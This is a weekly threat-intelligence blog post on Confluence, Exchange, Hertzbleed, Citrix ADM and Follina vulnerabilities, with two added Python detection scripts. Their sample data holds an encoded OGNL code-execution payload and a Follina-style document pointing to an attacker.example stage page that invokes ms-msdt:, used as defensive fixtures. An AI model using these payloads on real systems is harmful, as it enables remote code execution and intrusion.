CSW Weekly Threat Intelligence
Posted on Jun 27, 2022 | By Pavithra Shankar
The CSW weekly threat intelligence edition brings you early warnings about critical vulnerabilities that could be weaponized and prove dangerous to your organization and its assets.
Top Critical Cyber Threats of the Week
- Confluence servers hacked to deploy AvosLocker, Cerber2021 ransomware
- New Hertzbleed: A Side-Channel Vulnerability Attack Affects Intel and AMD CPUs
- CISA Added Follina to its Known Exploited Vulnerabilities Catalog
Confluence Servers Hacked to Deploy AvosLocker, Cerber2021 ransomware
Ransomware groups are exploiting CVE-2022-26134, an already patched OGNL injection vulnerability in Atlassian Confluence Server and Data Center that gives unauthenticated remote code execution. Several new Linux botnets are also abusing it for initial access into target networks. A week earlier, attackers had used the same flaw to install web shells on exposed servers.
Threat Associated CVEs: CVE-2022-26134
CVSS Score: 9.8
Vendor & Product: Atlassian Confluence Server and Data Center 7.4.0 through 7.18.0 (fixed in 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1)
Exploit Type: RCE Vulnerability
CWE: CWE-74
Ransomware Associations: Cerber2021, AvosLocker
APT Groups: NA
Malware: Linux Botnets
Early Warning: Our AI and ML models have given a Maximum rating for this vulnerability indicating a high risk of exploitation by attackers.
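The exploitation described above is visible in the Confluence (Tomcat) access log: the OGNL expression travels in the URI path as a `${...}` segment, usually percent-encoded and sometimes double-encoded. The scanner below is an added example (not CSW's or Atlassian's code) that decodes each logged request path until it stops changing and reports any path carrying such an expression. The log format, the `LOG_RE` pattern and the sample lines are constructed for the example; the addresses are documentation ranges, not real IOCs.

```python
"""Flag access-log requests that carry an OGNL ${...} expression in the URI path,
the request shape used against CVE-2022-26134 (added example, not CSW's code)."""
import re
from urllib.parse import unquote

# Assumed Tomcat/Confluence access-log shape (constructed for this example):
# client ident user [time] "METHOD path HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A ${...} expression anywhere in the decoded path is the indicator.
OGNL_RE = re.compile(r'\$\{[^}]*\}')


def fully_decode(path, max_rounds=5):
    """Undo percent-encoding until the string stops changing.
    Attackers double-encode to slip past naive single-decode filters, so one
    unquote() is not enough; the round limit keeps hostile input from looping."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def find_ognl_requests(lines):
    """Return (client, time, method, decoded_path, status) for every request whose
    decoded path contains a ${...} expression. Lines that do not match the log
    format are skipped rather than treated as errors."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = fully_decode(m.group("path"))
        if OGNL_RE.search(decoded):
            hits.append((m.group("client"), m.group("time"), m.group("method"),
                         decoded, int(m.group("status"))))
    return hits


# Constructed sample log: one single-encoded probe, one benign login request,
# one double-encoded canary expression.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2022:10:15:01 +0000] "GET /%24%7B%40java.lang.Runtime'
    '%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [03/Jun/2022:10:15:09 +0000] "GET /login.action HTTP/1.1" 200 5120',
    '203.0.113.5 - - [03/Jun/2022:10:16:40 +0000] "GET /%2524%257B7%252a7%257D/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in find_ognl_requests(SAMPLE_LOG):
        print(hit)
```

Do not filter on response status: against a vulnerable Confluence instance the public exploits received a 302 redirect while the command output came back in a response header, so a 302 on a `${...}` request is not evidence that the attempt failed. Treat every hit as a triage item and check the server for web shells and unexpected child processes of the Confluence Java process.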
BlackCat ransomware Targets Microsoft Exchange servers
Microsoft warns that a cybercrime gang exploited an unpatched Exchange server to deploy the BlackCat/ALPHV ransomware in a target organization. BlackCat affiliates reportedly used the Exchange vulnerability CVE-2021-31207 to gain access to the server and install a web shell for remote access. Microsoft did not name the Exchange vulnerability used for initial access, but its report links to a security advisory from March 2021 with guidance on investigating and mitigating ProxyLogon attacks.
Considering this, organizations should patch the below-listed BlackCat-associated CVEs, including the ProxyLogon vulnerabilities.
Threat Associated CVEs: CVE-2016-0099, CVE-2019-7481, CVE-2021-31207, and CVE-2021-26855.
Early Warning: Unusual hacker chat discussions about this vulnerability have increased its exploitability rating.
| Threat Associated CVEs | CVSS Score | Vendor & Product | Exploit Type | CWE ID | Ransomware Associations | APT Groups |
| --- | --- | --- | --- | --- | --- | --- |
| CVE-2016-0099 | 7.8 | Microsoft Windows (Secondary Logon service) | PE | CWE-264 | BlackCat | NA |
| CVE-2019-7481 | 7.5 | SonicWall SMA 100 series | SQL injection | CWE-89 | BlackCat, HelloKitty | - |
| CVE-2021-31207 | 7.2 | Microsoft Exchange Server | PE, RCE, WebApp | - | BlackByte, Cuba, Babuk, LockFile, Conti, Hive, AvosLocker, Karma, BlackCat | ChamelGang, TR |
| CVE-2021-26855 | 9.8 | Microsoft Exchange Server | PE, RCE, WebApp | - | Cuba, DearCry, EpsilonRed, Conti, AvosLocker, Black Kingdom | BRONZE BUTLER, HAFNIUM, FamousSparrow, Mikroceen, Threat Group-3390, Websiic, Winnti Group, Calypso, Mustang Panda, APT29, Tonto Team, TR |
New Hertzbleed: A Side-Channel Vulnerability Attack Affects Intel And AMD CPUs
A new side-channel vulnerability discovered by researchers from the University of Texas at Austin, the University of Illinois Urbana-Champaign and the University of Washington, dubbed Hertzbleed, could allow attackers to extract cryptographic keys from modern Intel and AMD CPUs, including remotely. The name comes from the mechanism: dynamic voltage and frequency scaling (DVFS) makes the CPU clock frequency depend on the data being processed, so data that is supposed to stay private bleeds out through execution time, even from code written to be constant-time. The vulnerability is tracked as CVE-2022-24436 for Intel chips and CVE-2022-23823 for AMD CPUs. No microcode patch is available; the vendors point to hardening in cryptographic libraries, and disabling frequency boost (Turbo Boost on Intel, Precision Boost on AMD) closes the channel at a performance cost.
Threat Associated CVEs: CVE-2022-24436 and CVE-2022-23823
| Threat Associated CVEs | CVSS Score | Vendor & Product | Exploit Type | CWE ID | Ransomware Associations | APT Groups |
| --- | --- | --- | --- | --- | --- | --- |
| CVE-2022-24436 | 6.3 | Intel | Information Disclosure | - | - | - |
| CVE-2022-23823 | - | AMD | Information Disclosure | - | - | - |
Critical Citrix Bug (CVE-2022-27511) Impacts All ADM Servers, Agents
Citrix is advising users of its Application Delivery Management (ADM) product to update against a newly disclosed vulnerability, CVE-2022-27511. Corruption of the system could allow a remote, unauthenticated user to reset the administrator password at the next device reboot. It affects all supported versions of the Citrix ADM server and Citrix ADM agent; the fixed builds are 13.1-21.53 and 13.0-85.19. Citrix also recommends that network traffic to the ADM's IP address be segmented from standard network traffic and limited to trusted sources.
Threat Associated CVEs: CVE-2022-27511
CVSS Score: 8.1
Vendor & Product: Citrix ADM server and Citrix ADM agent, all supported versions before 13.1-21.53 and 13.0-85.19
Exploit Type: Administrator password reset by an unauthenticated remote user (improper access control)
CWE: CWE-284
Ransomware Associations: NA
APT Groups: NA
Malware: NA
Early Warning: Our AI and ML models predict a high risk of exploitation by attackers.
CISA Added Follina to its Known Exploited Vulnerabilities Catalog
CISA added the Microsoft Follina zero day to its Known Exploited Vulnerabilities catalog after Microsoft shipped a patch on the June 2022 Patch Tuesday. Follina, tracked as CVE-2022-30190, is a remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT): a specially crafted Office document references an external HTML page, that page invokes the ms-msdt: URL protocol, and the PowerShell embedded in the URL runs with the privileges of the user who opened or merely previewed the document.
The vulnerability is being exploited by threat actors including TA413, APT28 and Sandworm, and by the TA570 affiliate that distributes QBot. Most notably, multiple proofs of concept were publicly available before the patch.
CVSS Score: 7.8
Vendor & Product: All current supported Windows versions
Exploit Type: RCE Vulnerability
CWE: NVD-CWE-noinfo
Ransomware Associations: NA
APT Groups: TA413, APT28, Sandworm, and TA570
Malware: QBot
Early Warning: Our AI and ML models have given a maximum rating for this vulnerability indicating a high risk of exploitation by attackers.
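The document side of the chain above can be checked without opening the file: a .docx is a zip, and the relationship part `word/_rels/document.xml.rels` lists where each embedded object lives. A benign OLE object points inside the package; Follina documents carry an oleObject relationship marked `TargetMode="External"` with an http(s) target, which is what pulls the remote HTML into Office. The scanner below is an added example (not CSW's or Microsoft's code) that flags such relationships and, as a second check, looks for the `ms-msdt:` scheme in fetched HTML. The sample documents and the `attacker.example` host are constructed for the example.

```python
"""Flag .docx files whose OLE relationships point to a remote http(s) target
(the Follina / CVE-2022-30190 document shape) and HTML that invokes ms-msdt:.
Added example, not CSW's code."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE_SUFFIX = "/relationships/oleObject"


def external_ole_targets(docx_bytes):
    """Return (rels_part, target) for every oleObject relationship in the package
    that is External and points at http(s). Every .rels part is examined, not just
    the main document's, so objects hung off headers or footnotes are covered too."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))  # bytes, so the XML declaration is honoured
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type", "").endswith(OLE_TYPE_SUFFIX)
                        and rel.get("TargetMode") == "External"
                        and target.lower().startswith(("http://", "https://"))):
                    findings.append((name, target))
    return findings


MSDT_RE = re.compile(r"ms-msdt:", re.IGNORECASE)


def html_invokes_msdt(html):
    """True if the page content references the MSDT URL protocol handler."""
    return bool(MSDT_RE.search(html))


def build_sample_docx(rels_xml):
    """Build the minimal zip the scanner reads (constructed test input, not a real
    document); Word would need many more parts to open it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml",
                   "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one remote OLE target, one normal embedded object.
SUSPICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
 <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.example/stage.html!" TargetMode="External"/>
</Relationships>"""

BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
 <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Constructed HTML fragment of the kind the remote page would carry.
SAMPLE_HTML = '<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force";</script>'

if __name__ == "__main__":
    print(external_ole_targets(build_sample_docx(SUSPICIOUS_RELS)))
    print(external_ole_targets(build_sample_docx(BENIGN_RELS)))
    print(html_invokes_msdt(SAMPLE_HTML))
```

An external OLE relationship is not malicious on its own (linked objects are a legitimate feature), but on a document that arrived by mail it is enough to quarantine and detonate rather than deliver. The HTML check is only meaningful on the fetched page, so run it on proxy-captured content or in a sandbox, never by fetching the target from an analyst workstation.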